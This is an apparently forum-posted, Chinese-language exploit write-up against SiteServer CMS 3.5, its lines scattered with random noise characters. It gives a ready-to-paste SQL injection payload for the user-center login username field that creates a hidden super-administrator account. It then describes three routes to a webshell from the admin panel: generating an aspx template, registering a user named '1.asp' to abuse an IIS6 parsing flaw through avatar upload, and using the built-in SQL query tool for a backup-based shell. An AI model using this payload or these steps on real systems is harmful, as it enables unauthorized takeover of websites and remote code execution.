经测试秒杀最新的3.5版
7 M# b9 i0 r# O( W2 z; c+ F, ]( v. ?
stieserver官网:www.siteserver.cn0 U1 [6 l2 R2 s0 i& W7 T3 L
+ r% d% e0 Q% }- T0 r6 Q
1 K) Z: A: c6 e
/ x9 c. d. U& Q% @- j8 _- Z% z% PEXP:+ [: i; N, f6 N' Z4 _2 u
' d2 p, d2 y `: K8 h直接访问UserCenter/login.aspx$ d/ E t9 [+ @+ W3 e9 _
8 R8 m! u; t1 Y8 n" _3 x. {
& J. ^2 F* g! e7 m* `- _. Y. j
4 M4 Q$ a# [ s# s9 U: ? t用户名处输入:
( [9 G# ^) Y' A+ @' p8 v
: Q7 w9 ^4 l: s1 [8 H4 X123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 `. e4 q2 Z2 o& Y9 i& o; w3 i) o. ]
6 Q) _* p9 ]5 V. K7 }1 z+ n3 Y, I: O7 P: ~4 n( E: {: {1 W4 |" U; V
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。% K. g- J; G% _
% O+ B- a& x" a" v ~ R
* u. l) R& Q" c- v7 u# Z
9 d6 l) P9 S* U5 _) |之后再访问后台SiteServer/login.aspx用插入的用户登陆
x* ?0 @1 p( q4 q' h) ]* l: v. D* ~! w6 R" Z' e& g1 L
& }- M5 [1 p) F, ~( Z, t& X1 K
/ p: b* u. W' z: h* P后台拿webshell的三种方法:6 ]+ P# I9 h& \
; I5 g$ A( J( |( A) {一、
! c! E' L/ p& d1 c2 n2 A6 _- G3 V+ r: Q5 V) p+ S, \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. C" ?: G/ R* X9 z5 S6 q
d4 s! |3 j" k) b
二、) y3 I7 }5 n& i6 ^4 I A# g
- S' s3 B# }' _) k( B
成员权限-》添加用户-》用户名为:1.asp1 R K& c3 S$ A1 H4 C* v, `* n
! B9 `9 \0 o6 q* A P0 k6 M% G! c; bhttp://127.0.0.1/usercenter/8 ~; r* s0 t8 c: y
- Z. h8 v" r4 ~
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% M' i: b. m* U8 Y5 S
: ~ r8 C5 @3 E(ps:后台添加用户时不会验证是否含有非法字符)2 s4 X, e# k- i
, a/ r$ K& u8 h6 r5 w" |
三、
7 d# j; w9 N. F5 q+ W& Y0 u: n5 m- Q' q l; ?! w
系统工具-》实用工具-》机器参数查看. N1 z5 ~: u- V0 G, ?; I
可以看到数据库类型、名称,WEB路径, C) j0 _/ e- y6 t6 p% K9 ]
3 ]" I( \/ ^7 r1 N" |
系统工具-》数据库工具-》SQL语句查询+ c" o0 `# O- A% B3 h+ O/ m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。2 j7 u/ ^1 a: R. z5 e/ M
7 N) h3 I( c9 [+ i( x |